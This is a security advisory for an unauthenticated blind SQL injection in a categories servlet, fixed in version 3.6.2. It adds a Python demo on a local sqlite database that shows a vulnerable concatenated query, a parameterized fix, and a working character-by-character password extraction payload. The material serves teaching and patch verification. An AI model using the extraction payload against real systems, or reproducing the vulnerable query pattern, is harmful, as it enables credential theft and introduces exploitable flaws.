Issues » Blind SQL injection

Issue: SI-39
Date: Jan 17, 2017, 6:30:00 AM
Severity: Critical
Requires Admin Access: No
Fix Version: 3.6.2
Credit: Ben Nott based on earlier findings of Elar Lang
Description:

SQL injection via the Categories Servlet; the request does not require authentication. The only concrete exploit we have at this time is against MySQL 5.5. Since the attacker-controlled string is passed to the database for evaluation, the vulnerability may also be exploitable on other database engines. We recommend everyone upgrade or take the necessary precautions.
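The advisory does not show the affected query, so the following is an added illustration of the bug class it describes, not dotCMS code: a request string spliced into SQL and evaluated by the database, exploited blind (the attacker never sees the secret, only whether the servlet returns a category or nothing), beside the parameterized form that closes the hole. The table names, the `category_name` parameter, the `user_` secret and the use of sqlite3 in place of MySQL 5.5 are all assumptions chosen for the demo.

```python
"""Boolean-based blind SQL injection: constructed demo, not dotCMS code.

Table names, the query shape and the stored secret are assumptions; sqlite3
stands in for the MySQL 5.5 backend named in the advisory.
"""
import sqlite3


def make_db():
    """Constructed sample data: a categories table plus an unrelated secret."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE category (inode TEXT, category_name TEXT);
        INSERT INTO category VALUES ('c1', 'news'), ('c2', 'products');
        CREATE TABLE user_ (user_id TEXT, password TEXT);
        INSERT INTO user_ VALUES ('admin', 's3cr3t');
        """
    )
    return con


def vulnerable_lookup(con, name):
    """Assumed shape of the flaw: the request parameter becomes SQL text."""
    sql = "SELECT inode FROM category WHERE category_name = '" + name + "'"
    return [row[0] for row in con.execute(sql)]


def fixed_lookup(con, name):
    """Hardened form: the value travels as a bind parameter, never as SQL."""
    sql = "SELECT inode FROM category WHERE category_name = ?"
    return [row[0] for row in con.execute(sql, (name,))]


def extract_blind(con, lookup, length):
    """Recover user_.password one character at a time through `lookup`.

    Nothing from the secret is echoed back; the only signal is whether the
    query returns a row (condition true) or an empty list (condition false).
    Returns the recovered prefix, which is empty against the fixed lookup.
    """
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            # Close the literal, AND in a condition on the secret, then
            # comment out the closing quote the vulnerable code appends.
            payload = (
                "news' AND substr((SELECT password FROM user_ "
                "WHERE user_id='admin'), %d, 1) = '%s' -- " % (pos, ch)
            )
            if lookup(con, payload):
                recovered += ch
                break
        else:
            break  # no character matched: end of secret or outside alphabet
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup leaks:", extract_blind(db, vulnerable_lookup, 6))
    print("fixed lookup leaks:     ", repr(extract_blind(db, fixed_lookup, 6)))
```

The payload never reaches the parser as SQL in `fixed_lookup`: the driver sends it as a bound value, the comparison is against the literal string and no row matches, so the same extraction loop returns an empty string. That is the property to verify in any patch, rather than relying on filtering of quote characters, which does not hold up across database engines.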

Mitigation:

Until you upgrade to 3.6.2, restrict the URL pattern /categoriesServlet to your administrators' IP range.